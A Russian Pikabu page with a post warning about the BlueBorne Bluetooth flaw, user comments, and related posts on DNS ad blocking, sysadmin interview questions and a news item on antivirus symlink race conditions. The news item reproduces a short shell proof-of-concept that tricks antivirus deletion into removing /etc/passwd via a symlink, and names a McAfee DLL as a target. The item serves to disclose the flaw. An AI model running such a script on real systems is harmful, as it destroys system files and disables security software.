270

Отключайте Bluetooth, или же уязвимость "BlueBorne"

Всем привет. Наверняка, в вашем телефоне/компьютере/планшете и т.д. есть Bluetooth. Оказывается, если вы его не отключаете в публичных местах это может повлечь за собой серьезные последствия. Например, над вашим телефоном будет полностью перехвачен контроль, а вы и не заметите.

Отключайте Bluetooth, или же уязвимость "BlueBorne" Вирус, Bluetooth, Android, Windows, Linux, Уязвимость, Привет читающим теги

Сначала, злоумышленник смотрит, какие есть устройства со включенным Bluetooth поблизости. Допустим, он нашел ваш телефон. Определяет MAC-адрес и операционную систему, которую вы используете. Далее, он уже может делать все что угодно, лучше всего показывает эту уязвимость данный ролик: https://www.youtube.com/watch?v=Az-l90RCns8 (Пикабу запрещает мне публиковать видео прямо в посте :( )


Из этого всего можно сделать вывод, то что даже если вы используете антивирус, не подключаетесь к публичным Wi-Fi сетям, но забыли выключить Bluetooth, то любой предприимчивый хакер может перехватить контроль над вашим банковским приложением через Bluetooth.


Отключайте Bluetooth, товарищи пикабушники.

Найдены возможные дубликаты

+59
Ну зашибись... Что теперь, фитнес-браслет выкинуть?
раскрыть ветку 60
+30

Тоже задалась этим вопросом, блютус работает 24/7 из-за браслета оО

раскрыть ветку 16
0
Надеюсь будут заплатки...
раскрыть ветку 1
-6

Оно не нужно 24/7, при включении все данные синхронизируются. Пожертвовать придется только уведомлениями с браслета

раскрыть ветку 3
-5
Прочитайте новость то!

У вас он включен в режиме видимости круглые сутки чтоли? Сомневаюсь - например у андроида он по умолчанию скрыт и макадрес просто так не узнать.

И бояться нечего тогда..

раскрыть ветку 3
-5
У меня тоже браслет. Думаю надо какую нибудь видимость отключить
раскрыть ветку 5
ещё комментарии
+5

Просто когда приближаешься к человеку ближе, чем на 30 метров (или сколько там синизуб ловит), то пробегай его мимо как можно быстрее. А если ездишь в поезде, то бегай по вагону.

+7

Я так почитал, почитал. И понял что на старину Windows Phone у них ничего нет. Я ни на что не намекаю, но...

Иллюстрация к комментарию
раскрыть ветку 6
+57

Ни игр, ни софта, ни смысла существования

P.S. Lumia 532 на Windows 10 Mobile

раскрыть ветку 3
+1

Ваш отзыв был прочитан командой наших разработчиков. Мы внесём изменения в следующем патче. С любовью, ваша команда КулХацкеры

раскрыть ветку 1
-2

Без паники

>Пока можно установить приложение «BlueBorne Vulnerability Scanner» (созданное командой Armis) из Google Play Store, чтобы проверить, уязвимы ли ваши устройства для атаки BlueBorne или нет.

-38

И вейпить перестать

раскрыть ветку 29
+10
Да причем тут вэйп то? Я браслет использую как будильники, как уведомление о звонке. можешь себе такое представить - телефон не жужжит, не пищит, а только на руке браслет вибрирует. Очень удобно когда надо соблюдать тишину. И будильник утром разбудит только меня.
ещё комментарии
+13
Не путайте тёплое с мягким
ещё комментарии
+12

Пейн, я связи не чувствую

раскрыть ветку 2
+1

А можно вы перестанете писать несмешные шутки?

-16

Думаешь с него что-то украсть могут?

раскрыть ветку 3
+6
Он к телефону через блютуз конектится
-11
Оу, а ты не очень в технической части, да?
ещё комментарии
ещё комментарии
ещё комментарии
+11

я чайник через синий зуб включаю

ещё комментарии
+30

То не ловкое чувство, когда ты немного параноик и по дефолту отрубаешь все, чем не пользуешься в данный момент и потом такая новость. С одной стороны ты - параноик, но с другой: "Я же говорил"!.

раскрыть ветку 6
+7

Я это делаю для более практического смысла - экономия батареи

раскрыть ветку 4
-3

Аналогично. Отключаю все сервисы, которые жрут батарею.

Из-за этого дома подбешивают звонки через watssup. Приходится их скидывать, врубать вайфай, и перезванивать. Но с постоянно включенным вайфаем телефон садится в 2 раза быстрее.

-3

У меня не айфон, потому нет проблем с батареей.

раскрыть ветку 2
+8

То чувство когда блютус не включаешь никогда. Потому что он ненужен.

+7

В свое время были телефоны, которые через "синийзуб" шарились в файлах другого телефона и скачивали оттуда, что хотели. Тогда это казалось верхом хакерства :D
Хотя, конечно, никакого хакерства там не было.

+4
раскрыть ветку 4
+3

Скорее тут: https://habrahabr.ru/company/cloud4y/blog/337782/ так как показана принципиальная схема его работы. Но все же одно и то же сколько уязвимостей столько и векторов атаки.

раскрыть ветку 3
+13
раскрыть ветку 2
+2
Хакер который возмет под контроль мой банковский счет заплачет от жалости.
раскрыть ветку 5
+1

От кого: 900

Текст: поступление средств на сумму 95 руб. от Гопник В.

Комментарий: чо ты как нищий, хуле. Семок купи.

раскрыть ветку 1
0

От души братан, уже затарился :)

0

да нет, это ты заплачешь от жалости, когда он всё бабло с него вытряхнет и уберёт баланс далеко в минус

раскрыть ветку 2
+4
Пусть начинает
Иллюстрация к комментарию
раскрыть ветку 1
+6

я хз когда вообще его включал на телефоне

раскрыть ветку 8
+41

Это если у тебя нет беспроводных наушников, умных часов, пульсометра или еще какой синезубой хрени. Если что-то из этого есть - скорее всего у тебя BT будет включен практически всегда.

раскрыть ветку 2
+14
Еще громкая связь в автомобиле.
+4

+
у самого фитнес трекер сяоми ми бэнд, бт практически всегда включен

-5

Последний раз я БТ включал в школе лет 15 назад :D

раскрыть ветку 4
+5
С тех пор многое изменилось. И скорости передачи данных по синезубу, на сегодняшний день, хватит даже на музыку в хорошем качестве.
0

Это не повод для гордости

раскрыть ветку 2
ещё комментарии
+1

Обновление прилетело, ну и ладненько

Иллюстрация к комментарию
+1
Возможно это правильно, но уже близко к темам из разряда "А что, если ...". На это безусловно надо обращать внимание, но не превращать в манию.
К данному случаю наверное не относится, но уж простите, накипело
+4
Допустим чтобы обнаружить зуб он должен быть в режиме обнаружения, не?
раскрыть ветку 3
+3

не совсем верно, зуб на постоянный основе опрашивает эфир. Более подробно расписано https://pikabu.ru/story/otklyuchayte_bluetooth_ili_zhe_uyazvimost_quotbluebornequot_5336802#comment_95693297

+4

увы нет, на хабре в статье написано

раскрыть ветку 1
+5

это верно, синий зуб можно было иметь будучи на яве, на старенькой motorola e398 можно было спокойно рассылать спам по всем открытым синим зубам. Думаю с того времени мало что поменялось. Даже не находящиеся в режиме обнаружения.

+1
Я меньше недели назад купил беспроводную гарнитуру
Вовремя блин
0
Сами сначала попробуйте это сделать, а потом репостите..
0
Вот,тебе и здрасте.
0
Не помню уже, когда в последний раз блютуз включал.
0

Мой стоматолог давно поменял на прочный зуб

0
Помнится ещё в годах когда у меня была раскладушка моторолы, v535 вроде, копались по голубозубу в другой раскладушке самсунга на уроке у одноклассницы.
0

В гуглоплее появились приложения, проверяющие уязвимость. Мой андроид уязвим.

-1
перехватить контроль над вашим банковским приложением

А не проще ли просто не пользоваться банковскими приложениями с мобильника?

раскрыть ветку 3
0
Ведь ходить к банкомату каждый раз это такая классная и наибезопаснейшая затея.
раскрыть ветку 2
-2

Эм... у вашего банка нет вебсервиса которым можно пользоваться с ПК? Не понимаю ваших чаяний.

раскрыть ветку 1
-5
Отключайте Bluetooth

а включать зачем?

раскрыть ветку 13
+10
Странный вопрос. Связь с гарнитурой. И еще тысяча возможностей использования.
раскрыть ветку 7
+3

Да, я чёт забыл об этой хуйне напрочь)

-8
Вот кроме связи с гарнитурой вам прекрасно поможет wi fi. Да и гарнитуру лучше на wi fi наверно.
раскрыть ветку 5
ещё комментарии
+2

Вот кто с часами/фитнес браслетами ходит, тому вообще жопа. Мне, например.

раскрыть ветку 1
0

Уже сказали. Я вспомнил)

0
Гарнитура, браслет, поржать с названий устройств людей, которые тебя окружают.
0

Фитнес браслеты и смарт часы

-2
Иллюстрация к комментарию
-7
iOS снова в пролёте. Яблочники снова могут винить свою ущербную закрытую систему.
раскрыть ветку 5
+11

"Armis раскрыл Apple сведения об этой атаке. Эксплойт был устранён в версии IOS 10 и версии Apple TV выше 7.2.2, однако эта уязвимость по-прежнему представляет большой риск для любого iOS-устройства до версии 10. Уязвимость может быть использована злоумышленником для выполнения кода с повышенными привилегиями."

раскрыть ветку 3
+3

Так она год назад вышла, то есть уже год об этой атаке что ли известно?

раскрыть ветку 1
+1
Ну в том то и смысл что на актуальных версиях все уже пропатчено. А у эпл с обновлениями все гуд, 89 процентов устройств на новой системе.
-4
Лошары, ну!
ещё комментарии
-1
Допишите в тему, что уязвим только Android, на яблоках все ок
-1

код подключения к устройству? или плевать:?

раскрыть ветку 1
+3
или плевать
-5

>блютус

>2017

Соснули яблофаги и кабанчики метающиеся на созвон циферки обкашливать, ибо кроме них никто блютус парашей вместо наушников не пользуется.

Причём кабанчики пользуются исключительно моноухом а-ля привет нулевые, лишь бы держать телефон не на виду. Так как показывать свой копеечный суйоми человечкам от пал палычей стыдно.

-6

По идее без сопряжения не перехватят. Но это неточно... Полно лохов которые его подтверждают просто из любопытсва.

раскрыть ветку 2
+5
Сопряжение не надо
раскрыть ветку 1
-3

Какая милота. Прям за душу берет. Пойду выпаивать синезуба. Мне шестерки не нужны ^_^

-22
@moderator, видео ссылкой
ещё комментарии
Похожие посты
12017

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Читал аналогичный пост, написанный 2 дня назад для ПК, и судя по комментариям, вопрос животрепещущий, т.к. бо́льшую часть времени мы всё-же проводим с телефоном в обнимку)

Итак, как заблокировать надоедливую рекламу, всплывающую в приложениях, при просмотре сайтов, принудительно открывающуюся в играх, и всё это без шаманских танцов с бубном, сторонних программ и платных sms на короткие номера?)

Всё просто!

Для Android:
Настройки > в поисковой строке пишем "DNS" > Персональный DNS сервер > Имя хоста DNS > прописываем "dns.adguard.com > Profit!
Вы прекрасны, великолепны и у вас теперь нет рекламы!))
Для визуалов, ниже в картинках, как это сделать:

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

! В разных прошивках и у разных производителей название может различаться, поэтому смотрите, чтобы слово "DNS" было в пункте меню !

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Для Xiaomi и кастомных прошивок на его основе (MIUI) может потребоваться дополнительное приложение, если не отображает этот пункт меню:

Скачиваем с Play Маркета программу:
Hidden Settings for MIUI
https://play.google.com/store/apps/details?id=com.ceyhan.set...

Далее там выбираем пункт "Private DNS" и также прописываем настройку.

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Если у вас не находит данный пункт меню в телефоне, просто поищите в Гугле, по фразе:
Как настроить DNS на Samsung A10 (представьте свое название производителя и модели)

А как-же владельцы iPhone и iPad спросите вы?
А никак! Ябочники должны страдать!
Ну, или покупать настройку всего за 19,99$
Муа-ха-ха-ха! "Зловещий смех"))

На самом деле здесь всё запутанней, сложнее и вообще, я, как старый "пират" не особо люблю айось за закрытость платформы, ну вы поняли)

Итак, настройка DNS в iOS (iPhone, iPad):1)Войдите в меню настроек устройства
2)Выберите пункт «Wi-Fi» (для мобильных сетей ручная настройка DNS невозможна).
3)Нажмите на название сети, к которой устройство подключено в данный момент.
4) В поле «DNS» введите введите адреса DNS:
176.103.130.130 (основной)
и
176.103.130.131(дополнительный)
чтобы прописать сервера AdGuard
либо
8.8.8.8
и
8.8.4.4
чтобы прописать DNS от Google

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Итак, поздравляю!
Теперь и вы тоже прекрасны и можете наслаждаться пользованием телефоном без рекламы)

Кстати, если вы геймер и в играх смотрите рекламу - отключайте эти настройки, когда играете, иначе не видеть вам бонусного золота, алмазов и прочих плюшек))

Пы.Сы.
Если вы хотите иметь альтернативу, чуть ниже приведу список открытых DNS серверов с описанием:

OpenDNS
208.67.222.222 
208.67.220.220
 Достоинства:
Давно представлен на рынке
Блокирует фишинг-сайты
Дополнительная веб-фильтрация

Cloudflare
1.1.1.1 
1.0.0.1
 Достоинства:
Отличная производительность
Строгие правила конфиденциальности
Поддержка на форуме сообщества

Также Cloudflare ввел фильтрацию вредоносного ПО через серверы: 1.1.1.2 и 1.0.0.2
и блокировку контента для взрослых (особенно актуально будет тем, у кого маленькие детки пользуются смартфоном) через серверы 1.1.1.3 и 1.0.0.3.

Google Public DNS
8.8.8.8 
8.8.4.4
 Достоинства:
Прозрачность и соблюдение конфиденциальности
 Недостатки:
Предназначен для опытных пользователей

Яндекс.DNS
77.88.8.8 
77.88.8.1
 Достоинства:
Защита от вредоносного ПО
Стабильность
 Недостатки:
Не самая высокая скорость работы

Comodo Secure DNS
8.26.56.26 
8.20.247.20
 Достоинства:
Фокус на безопасность
Обработка припаркованных доменов
 Недостатки:
Не самая лучшая производительность

Quad9 DNS
9.9.9.9 
149.112.112.112
 Достоинства:
Высокий уровень производительности
Блокировка вредоносных доменов
 Недостатки:
Мало информации по настройке

Adguard DNS
176.103.130.130 
176.103.130.131
 Достоинства:
Блокировка рекламы, счетчиков и фишинг-сайтов
 Недостатки:
Блокируется не вся реклама из-за технологических ограничений

Пы.Пы.Сы. На этом всё) Пользуйтесь на здоровье, и пусть ваш интернет всегда будет чистым, а устройства без вирусов!))

Показать полностью 7
62

Большинство антивирусов оказались подвержены атаке через символические ссылки

Большинство антивирусов оказались подвержены атаке через символические ссылки Антивирус, Mac Os, Windows, Linux, Длиннопост

Исследователи из компании RACK911 Labs обратили внимание на то, что почти все антивирусные пакеты для Windows, Linux и macOS были уязвимы для атак, манипулирующих состоянием гонки (race conditions) во время удаления файлов, в которых обнаружено вредоносное ПО.


Для проведения атаки необходимо загрузить файл, который антивирус распознает как вредоносный (например, можно использовать тестовую сигнатуру), а через определённое время, после выявления вредоносного файла антивирусом, но непосредственно перед вызовом функции для его удаления, подменить каталог с файлом символической ссылкой. В Windows для достижения того же эффекта выполняется подмена каталога при помощи точки соединения (directory junction). Проблема в том, почти все антивирусы должным образом не выполняли проверку символических ссылок и, считая что удаляют вредоносный файл, удаляли файл в каталоге на который указывает символическая ссылка.


В Linux и macOS показано как таким способом непривилегированный пользователь может удалить /etc/passwd или любой другой системный файл, а в Windows DDL-библиотеку самого антивируса для блокирования его работы (в Windows атака ограничена только удалением файлов, которые в текущим момент не используются другими приложениями). Например, атакующий может создать каталог "exploit" и загрузить в него файл EpSecApiLib.dll с тестовой сигнатурой вируса, после чего перед удалением заменить каталог "exploit" на ссылку "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", что приведёт к удалению библиотеки EpSecApiLib.dll из каталога антивируса. В Linux и macos аналогичный приём можно проделать с подменой каталога на ссылку "/etc".


#!/bin/sh

rm -rf /home/user/exploit ; mkdir /home/user/exploit/

wget -q https://www.clicklink.app/download/eicar.com.txt -O /home/user/exploit/passwd

while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”

do

rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit

done


Более того, во многих антивирусах для Linux и macOS было выявлено использование предсказуемых имён файлов при работе с временным файлами в каталоге /tmp и /private/tmp, что могло использоваться для повышения привилегий до пользователя root.


К настоящему времени проблемы уже устранены большинством поставщиков, но примечательно, что первые уведомления о проблеме были направлены производителям ещё осенью 2018 года. Несмотря на то, что не все производители выпустили обновления, им было дано на исправление как минимум 6 месяцев, и RACK911 Labs считает, что теперь вправе раскрыть сведения об уязвимостях. Отмечается, что компания RACK911 Labs давно занимается работой по выявлению уязвимостей, но она не предполагала, что с коллегами из антивирусной индустрии будет так трудно работать из-за затягивания выпуска обновлений и игнорирования необходимости срочного устранения проблем с безопасностью.


Продукты, подверженные проблеме (свободный антивирусный пакет ClamAV в списке отсутствует):


Linux

BitDefender GravityZone

Comodo Endpoint Security

Eset File Server Security

F-Secure Linux Security

Kaspersy Endpoint Security

McAfee Endpoint Security

Sophos Anti-Virus for Linux


Windows

Avast Free Anti-Virus

Avira Free Anti-Virus

BitDefender GravityZone

Comodo Endpoint Security

F-Secure Computer Protection

FireEye Endpoint Security

Intercept X (Sophos)

Kaspersky Endpoint Security

Malwarebytes for Windows

McAfee Endpoint Security

Panda Dome

Webroot Secure Anywhere


macOS

AVG

BitDefender Total Security

Eset Cyber Security

Kaspersky Internet Security

McAfee Total Protection

Microsoft Defender (BETA)

Norton Security

Sophos Home

Webroot Secure Anywhere

Показать полностью
186

Системный администратор Linux. Вопросы. Часть 4. Финал

«Всё, что имеет начало, имеет и конец, Нео».

Системный администратор Linux. Вопросы. Часть 4. Финал Linux, Windows, Сисадмин, Отдел кадров, Пригорело, Собеседование, Длиннопост

Серия вопросов подходит к завершению и остался последний, самый объёмный вопрос:


В: У Вас маленькая организация. Есть некий сервер, который совмещает в себе много разных функций. Шлюз, файлопомойка, прокси, web-сервер, даже есть виртуалка на KVM, внутри которой крутится условная 1С на windows. В один прекрасный момент к Вам начинают сыпаться сообщения от пользователей, что «Всё тормозит и ничего не работает». Ваши действия? Что и как диагностировать будете? Какими командами? Гуглить времени нет из-за ощущения влажного дыхания директора в затылок.


О: Диагностику можно условно разделить на четыре этапа. По количеству компонентов, которые могли стать «слабым звеном». Это процессор, память, диск и сеть. Но, в первую очередь, надо смотреть в логи. Основное - dmesg, syslog, messages. Зачастую это сэкономит массу времени. Так же не стоит забывать про встроенные средства обзорного мониторинга. Например sar позволяет понять что происходило с системой в последнее время без внешнего мониторинга. Так же различные средства внешнего мониторинга позволят получить обзор системы за последнее время и понять какие метрики являются аномальными. Если этого нет, метрик недостаточно или нужно смотреть в реальном времени - по шагам смотрим каждый компонент:


- Процессор. Необходимо понимать и знать какая нагрузка на процессор данного сервера является штатной. Т.е. нагрузка в 80% может быть вполне нормальной для сервера, а 20% может быть повышенной. Для этого нужен какой-либо мониторинг, который обеспечивает хранение исторических данных, внешний - zabbix, observium, spectrum, munin, или внутренний - sar. Текущую нагрузку можно посмотреть командой top и её производными, htop, atop и прочими, либо sysstat, vmstat. Можно посмотреть load average командой uptime. Если нагрузка аномальна - надо понимать из чего она складывается. Тут три основных компонента - User time, IO wait и System или kernel time. Соответственно это время процессора, затраченное на приложения пользователя, ожидания ввода/вывода и на работу самом системы. С user time всё относительно просто. Достаточно определить проблемное приложение и «поправить» его настройки или просто перезапустить его. IO wait - скорее всего проблема с дисковой подсистемой и более детально об этом будет ниже. Если повышен System time - значит сама система потребляет завышенное количество ресурсов. Причин может быть много и надо иметь более детальное представление о системе. Например старые версии Ubuntu имели глючный kswapd, который утилизировал процессор на 100% при своей работе. Или большое количество сетевых пакетов в следствии той или иной разновидность dos/ddos. Или «залипло» некое приложение пользователя и плодит тяжелые для системы операции, такие как выделение/освобождение памяти или создание большого количества процессов и их завершение.


- Память. Утилизацию можно посмотреть командами top, free, cat /proc/meminfo, vmstat, sar. Необходимо обратить внимание на объём свободной памяти и использование swap. Надо понимать, что метрика «free» не всегда отображает реальное положение дел. В частности буферы/кеш, которые могу занимать память, но могут выгружаться из неё при необходимости. Так же надо знать какие данные попадают в swap. Например, почему при свободной памяти может использоваться swap.


- Диск. Крайне желательно понимать что за диски, как они подключены и собраны. Информацию по использованию можно посмотреть командами iostat или iotop. Первая работает в разрезе блочных устройств, вторая по приложениям. Метрики на которые надо обратить внимание - скорость чтения/записи, время ожидания, количество операций, утилизация устройства. Далее, в зависимости от типа дисков, есть разные варианты развития событий. У виртуальных машин при аномалиях нужно смотреть на диски гипервизора и их утилизацию. У физических серверов - на тип диска и транспорт подключения. Если это обычный диск - смотрим smart и прочие метрики диска командами smartctl, hddtemp, hddparm. Большое количество bad-блоков или перегрев диска могут отрицательно влиять на скорость. Если диски собраны в raid - смотрим на его состояние. Если это программный рейд - команды mdadm или zpool. Для аппаратных через утилиты производителя или через iLO. Для внешних диском надо смотреть из транспорт. Это FC или сеть. Для FC смотрим статистику портов на SAN свичах командами sfpshow, porterrshow и т.д. Для сети смотрим количество ошибок портах командами ifconfig, ip, cat /proc/net/dev. Для внешних дисков так же надо смотреть нагрузку на дисковом массиве или SDS. Так же это могут быть так называемые шумные соседи, которые при отсутствии QOS или его неправильной настройке могут оказывать взаимное влияние.


- Сеть. Для начала можно просто проверить пингом. Обычным и тяжелыми пакетами, размером 1кб. Далее смотрим ошибки на портах сервера или на коммутаторе (если есть доступ). Команды выше. Проверяем настройки командой ethtool. Смотрим скорость интерфейса и подключения. Смотрим внешний мониторинг на предмет утилизации сети. Пробуем проверить качество канала чем то простым, вроде ftp. Если сервер удалённый - смотрим маршруты, на предмет потерь и перестройки. Для этого можно использовать tracepath или mtr.


На этом всё. Для тех, кто дочитал до конца всю серию постов и кому это всё интересно - у меня есть небольшой бонус:


В конце января я решился на один интересный эксперимент. Я выложил на популярных сайтах по поиску работы своё резюме с завышенным ценником. Ну вернее я выложил в регионе резюме с московской зарплатой. Раз в неделю я понижал ожидаемый уровень зарплаты и смотрел количество отзывов, приглашений на собеседования, реальных собеседований, а так же приглашений на работу. Следующий пост будет накопительным, с января по текущую дату, а дальнейшие посты - еженедельные отчёты по успехам. Ну и в последнем посте я попытаюсь собрать всю информацию и сделать отчёт, на сколько востребованы Linux-администраторы в регионах, что предлагают и что ожидают в ответ.


To be continued…

Показать полностью
370

Системный администратор Linux. Вопросы. Часть 3

Данный пост является продолжением серии постов про собеседования на должность системного администратора linux. По традиции комментарии к предыдущему посту (Системный администратор Linux. Вопросы. Часть 2) в большинстве своём скатились в срач. Адекватных были единицы, но ради них эти посты я и пишу.


У меня меленькая просьба к подписчикам и тем, кто сохраняет в избранное мои посты - оставляйте хоть какой-то фидбек. Хотя бы в виде плюса или минуса посту. Сейчас примерно половина сохранений без оценки и это нагоняет тоску.

Системный администратор Linux. Вопросы. Часть 3 Linux, Windows, Сисадмин, Отдел кадров, Пригорело, Собеседование, Длиннопост

Вводные завершены, продолжаем список вопросов и ответов.


В: Как отключить iptables на RHEL/Centos 7?

О: Начиная с 7й версии было изменено название демона с iptables на firewalld. Для отключения надо сделать systemctl stop firewalld, а так же отключить его запуск при загрузке systemctl disable firewalld.

В+: Всегда ли этого достаточно?

О+: Нет. Иногда используются надстройки и кастомные скрипты для восстановления правил iptables после перезагрузки. Надо просмотреть вывод systemctl status на предмет скриптов восстановления iptables, а так же post-up, pre-up, post-down, pre-down скрипты в /etc/sysconfig/network-scripts/.


В: Как выполнить некий скрипт на условной 1000 серверов?

О: Можно написать скрипт, который будет обходить сервера по списку и выполнять на них нужные действия.

В+: А есть какие то готовые решения?

О+: Да. Сейчас особенно популярен Ansible. Помимо него есть puppet, chef и т.д. Так же есть различные web-интерфейсы для данных систем. Такие как платный Ansible Tower или бесплатные AWX, Foreman.


В: Необходимо сделать резервное копирование неких данных. Что бы Вы использовали? Как сделать дёшево и как правильно?

О: Самое простое и дешевое решение это архивация неких данных и вынос на внешний носитель. Для работы с обычными файлами этот метод вполне рабочий. А вот для копирования баз данных, особенно больших и нагруженных, такой метод не подходит. Всё дело в том, что между началом копирования и завершением проходит достаточно много изменений в базе и на выходе получается не консистентный бекап. В таких случаях используется логирование действий для последующей «догонки» базы до актуального состояния. Например в psql для этого используется WAL, у oracle это FRA и т.д., но это уже в зоне ответственности администратора баз данных. Виртуальные машины можно бекапить снапшотами с ротацией и выносом их на другой носитель.

В+: А более «взрослые» решения?

О+: Для этого есть масса программно-аппаратных комплексов. Обычно это некий софт, под управлением которого работают дисковые массивы с дедупликацией, компрессией и репликацией. Для наиболее холодных или наиболее разностных данных используются ленточные библиотеки.


В: Есть безлимитный бюджет и задача построить максимально отказоустойчивую инфраструктуру. Ваши действия.

О: Основное правило - всех элементов по два. Если говорить про сервер, под систему должно быть два диска в зеркале (тут обычно спрашивается про то, какие raid бывают) или загрузка по SAN, две сетевые карты с LACP или иной active-active агрегацией, два независимых HBA адаптера в двух PCI слотах, каждый из которых подключается в отдельную SAN фабрику. Два блока питания на раздельных линиях питания. Разумеется таких серверов должно быть тоже два. Желательно в разных, георазнесённых, ЦОДах.

В+: А что касается остальной, не серверной части?

О+: Тот же принцип - всего по два. Главное, что бы приложение, которое работает в этой инфраструктуре, тоже умело резервироваться. Т.е. работало по принципу active-active или active-standby без участия человека. Так же, надо учитывать, что одно «плечо» должно тянуть суммарную нагрузку и при этом не упираться в свой предел. Например, штатный максимум по нагрузке на CPU одного плеча - 40%. При падении старого плеча будет 80%. И останется 20% на непредвиденные ситуации, которые часто в таких случаях появляются.


В: Что нужно для кластерной виртуализации?

О: Основное требование - наличие общего хранилища. Так же желательно иметь одинаковые настройки сети на всех нодах кластера. Это нужно для горячей миграции и для миграции машин при авариях.


В: Каким образом можно подключить диски к кластеру?

О: Общее хранилище может быть реализовано различными средствами - SAN, iSCSI, Ceph.

В+: Какой способ оптимальный из предложенных?

О+: Всё зависит от инфраструктуры, целей, бюджета и количества инженеров, выделенных на поддержку. Например Ceph можно собрать из весьма разносортных нод. При минимальном бюджете это хорошее решение. Вот только затраты человеческих ресурсов на него значительно завышены. SAN - дорогое по железу и относительно простое в поддержке решение. В любом случае придётся платить. Либо за железо, либо инженерам.


В: В чём преимущество Fibre Channel перед iSCSI?

О: В SAN сетях есть гарантированная доставка, меньше накладных ресурсов, сеть разрабатывалась как транспорт для дисковых носителей. В тоже время iSCSI это надстройка над ethernet, со всеми его недостатками.

В+: Допустим у нас есть два простых FC свича и два Ethernet свича. Каждую пару свичей мы соединим двумя линками. Что с ними произойдёт?

О+: FC свичи, при наличии лицензии, объединят два линка в один с удвоенной пропускной способностью. Ethernet свичи получат так «кольцо» и перестанут работать спустя какое-то время, которое зависит от объёма траффика в данном сегменте сети.


В: Есть некая виртуальная машина на VMWare. У машины 2 гигабайта памяти. В настройках машины стоят галочки «Можно добавлять память на горячую» и «Можно добавлять процессор на горячую». Внутри машины стоят все нужные гостевые дополнения. Система стоит x64. Можно ли сделать машине 6 гигабайт памяти на горячую?

О: Нет. На горячую можно будет подойти к отметке в 4 гигабайта, но пересечь её не получится.

В+: Почему? Система, ведь, поддерживает?

О+: Основной принцип памяти - отсутствие фрагментации. Т.е. вся память должна быть непрерывна. Если система стартует с объёмом памяти менее 4 гигабайт, часть старших адресов 32-битной шины резервируется под ввод-вывод. Соответственно расширять память можно до этих пределов. Если на старте памяти было 4 гигабайта и более, под ввод-вывод резервируется блок в верхней части уже существующего 64-битного адресного пространства.


В: Есть неограниченный бюджет и некая абстрактная платформа, которая умеет много памяти. Какой теоретический максимум памяти можно установить в такой сервер если система x86 и если система x64?

О: Предел x86 - 32 бита непрерывного адресного пространства, т.е. 4 гигабайта. Однако с использованием PAE объём памяти увеличивается до 64 гигабайт, но не более 4 гигабайт на процесс, т.к. адресная шина так и сталось 32 бита. Теоретический предел существующих x64 систем - 48 бит адресного пространства.

В+: Из чего получаются эти 48 бит?

О+: Размер страницы памяти 4 килобайта или 12 бит. Нумерация страниц - 36 бит. Итого получается 256 терабайт памяти.


На этом пока всё. Остался последний большой вопрос, объёмом на отдельный пост.

Показать полностью
104

Системный администратор Linux. Вопросы. Часть 2

В комментариях к предыдущему посту (Системный администратор Linux. Вопросы) собрались в основном писатели, а не читатели. Чаще всего звучал вопрос: «а это на какой уровень?». Ответ простой - ни на какой. Это всего часть вопросов от простого к сложному. И в данном посте тоже будет только часть.


Вторыми по популярности была критика вида «Ваши вопросы говно» и рекомендации как именно надо проводить собеседования и что спрашивать. По личному опыту, такое обычно звучит от «Диванных эникеев». По этому если у Вас пригорает - я на верном и пути. А главное, помните, Ваше мнение важно для всех людей в этой комнате:

Системный администратор Linux. Вопросы. Часть 2 Linux, Windows, Сисадмин, Отдел кадров, Пригорело, Собеседование, Длиннопост

Ну а тем, кому интересны вопросы, продолжаем.


В: Как сменить забытый пароль root?

О: Загрузиться с LiveCD, смонтировать файловую систему, сделать chroot, сменить командой passwd. Если файловая система поверх LVM - может понадобиться активировать LV.

В+: А если нет возможности использовать LiveCD?

О+: Можно попробовать загрузиться в Single Mode. В RHEL-based дистрибутивах надо в grub нажать E, найти init и исправить на init=/bin/bash, а так же опцию ro исправить на rw. После этого нажимаем X, система загрузится и сразу запустится shell от root. Далее меняем пароль командой passwd.


В: Вы подключаетесь к серверу по ssh и первое, что надо понять, это физический сервер или виртуальный. Для виртуального надо определить тип гипервизора.

